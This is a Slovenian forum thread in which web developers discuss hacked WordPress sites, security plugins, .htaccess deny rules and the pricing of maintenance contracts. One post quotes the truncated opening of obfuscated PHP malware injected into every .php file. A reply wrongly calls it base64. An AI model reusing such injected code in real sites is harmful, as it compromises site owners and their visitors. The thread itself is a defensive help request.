Nenehni vdori na Wordpress strani
 
Tody 13. okt 2014 10:17:08 Pridružen od:
3. maj 2010
1446 objav
1411 299 25
#21

Tele vdori so stvar ponudnika ali kakega plugina. Jaz sem imel enkrat en plugin ki je poslal takoj mail ko je ugotovil da se datoteke na strani spremenijo in to ti je signal da moreš nekaj narediti. Tukaj je blog od enega hostinga kako se oni spopdajao s tem

http://www.a2hosting.com/blog/stay-away-from-wordpress-security-plugins



Hočem rečt maš lahko kup pluginov ampak z vsakim je pomoje tveganje večje.


všeč(0) ni všeč(0) spam(0)
![](http://www.internetmojster.com/splosno/dobrodelna-akcija.html)
 
nd2 13. okt 2014 12:49:29 Pridružen od:
4. mar 2014
16 objav
6 3 0
všeč(0) ni všeč(0) spam(0)
Ukinjam **na današnji dan**, če si jo kdo želi (simbolično) lahko kontaktira na mail ali ZS (promet izključno iz iskalnikov)
 
d3 13. okt 2014 16:56:32 Pridružen od:
21. jun 2014
86 objav
99 25 3
#23

Ja dejansko je tole postalo nevzdržno. Sploh si ne moreš več privoščit, da bi nekomu naredil page v enem CMS in ga pustil nedotaknjenega za par mesecev.. V bistvu moraš vsak teden si vzet 15minut časa, da pregledaš page, če je vse OK, če so kakšni novi faili nastal itd..



Konec je časov 1x plačila za postavitev spletnega portala. Mislim, da je potrebno ponujati tudi mesečno vzdrževanje spletnih strani, ne samo zaradi hostinga ampak tudi zaradi varnosti. Že kdo to izvaja in kje se gibljejo cene?


všeč(5) ni všeč(0) spam(0)
*Uporabniku je bila prepovedana uporaba foruma zaradi večih uporabniških računov, ki so po [pravilih obnašanja](/pravila.html) prepovedani.*
 
Matjaž 13. okt 2014 17:05:06 Pridružen od:
21. sep 2007
3505 objav
2603 308 45
#24

d3:

Ja dejansko je tole postalo nevzdržno. Sploh si ne moreš več privoščit, da bi nekomu naredil page v enem CMS in ga pustil nedotaknjenega za par mesecev.. V bistvu moraš vsak teden si vzet 15minut časa, da pregledaš page, če je vse OK, če so kakšni novi faili nastal itd..



Konec je časov 1x plačila za postavitev spletnega portala. Mislim, da je potrebno ponujati tudi mesečno vzdrževanje spletnih strani, ne samo zaradi hostinga ampak tudi zaradi varnosti. Že kdo to izvaja in kje se gibljejo cene?




Kdaj si pa ti začel strani delat, da si šele zdaj to pogruntal? :))

Podpora strankam je no.1 ponudba od nekdaj ;)


všeč(2) ni všeč(0) spam(0)
 
d3 13. okt 2014 18:00:29 Pridružen od:
21. jun 2014
86 objav
99 25 3
#25

Ja dobr ni treba bit pametn zdj :))) pac zanima me kolk casa namenite varnosti in kolk dodatno racunate za to


všeč(1) ni všeč(1) spam(0)
*Uporabniku je bila prepovedana uporaba foruma zaradi večih uporabniških računov, ki so po [pravilih obnašanja](/pravila.html) prepovedani.*
 
ivank 13. okt 2014 18:43:06 Pridružen od:
10. okt 2014
9 objav
1 0 0
#26

Ali lahko kak boljši poznavalec za vse nas, ki to nismo, napiše kaj točno je potrebno storiti in prilepi kodo?



Tody, hvala za link. Takšne konkretne nasvete bi pričakoval tudi od domačih ponudnikov gostovanj in bi vsi imeli precej manj dela in težav. Je to, kar predlaga ta hosting OK? http://www.a2hosting.com/kb/security/application-security/wordpress-security



Preko iThemes Security je bil med drugim narejen deny:


             <files .htaccess>
Order allow,deny
Deny from all
</files>
<files readme.html>
Order allow,deny
Deny from all
</files>
<files readme.txt>
Order allow,deny
Deny from all
</files>
<files install.php>
Order allow,deny
Deny from all
</files>
<files wp-config.php>
Order allow,deny
Deny from all
</files>

Ali je ta security vtičnik samo za hec? Torej moram še enkrat narediti deny v .htacces in config.php?

iThemes je našponan do konca, razen SSL in še nečesa, Limit Login Attempts je vključen.



Nič ne pomaga, zadnje mesece samo še restoramo :-(


všeč(0) ni všeč(0) spam(0)
 
ivank 13. okt 2014 18:56:50 Pridružen od:
10. okt 2014
9 objav
1 0 0
#27

Vsaka .php datoteka ima na začetku vstavljeno morje znakov:



<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) {$ua=strtolower($_SERVER["\x48\124\x54\1 ............



Kaj pomaga, če to zbrišem? Ali z brisanjem sesujem stran?


všeč(0) ni všeč(0) spam(0)
 
OvcaX 13. okt 2014 19:40:39 Pridružen od:
24. avg 2007
2753 objav
4575 1194 281
#28

Ja to je base64 kodirana koda. Briši.



Najbolje bi bilo sicer gor dat backup verzijo pa updatat vse


všeč(0) ni všeč(0) spam(0)
CEO@Humanfrog & CEO@Junai
 
suprpp 13. okt 2014 21:16:58 Pridružen od:
21. jun 2008
362 objav
841 126 37
#29

d3:

Mislim, da je potrebno ponujati tudi mesečno vzdrževanje spletnih strani, ne samo zaradi hostinga ampak tudi zaradi varnosti. Že kdo to izvaja in kje se gibljejo cene?




Mi to nudimo za 55 EUR + DDV na leto za WP, Joomla in podobno.


všeč(5) ni všeč(0) spam(0)
SSD spletno gostovanje in Registracija domene NEOSERV
cPanel, PHP 4-7, SSH, GIT, SVN | 800+ domenskih končnic | Brezplačna selitev strani k NEOSERV
 
Gusar 14. okt 2014 05:32:57 Pridružen od:
21. jan 2014
65 objav
14 3 0
#30

Redna mesečna tehnična podpora je priporočljiva, izvaja se naj vsaj 1x na 3 mesece. Cena je odvisna od obsega spletne strani - od 25€ - 100€ na mesec. Odvisno od dogovora s stranko kaj podpora zajema. Pogodba se podpiše za čas zakupa domene in ob podaljšanju zakupa praviloma tudi podaljša.


všeč(1) ni všeč(0) spam(0)
 
 

🔒 Za odgovor na to temo se moraš prijaviti.

Prijavi se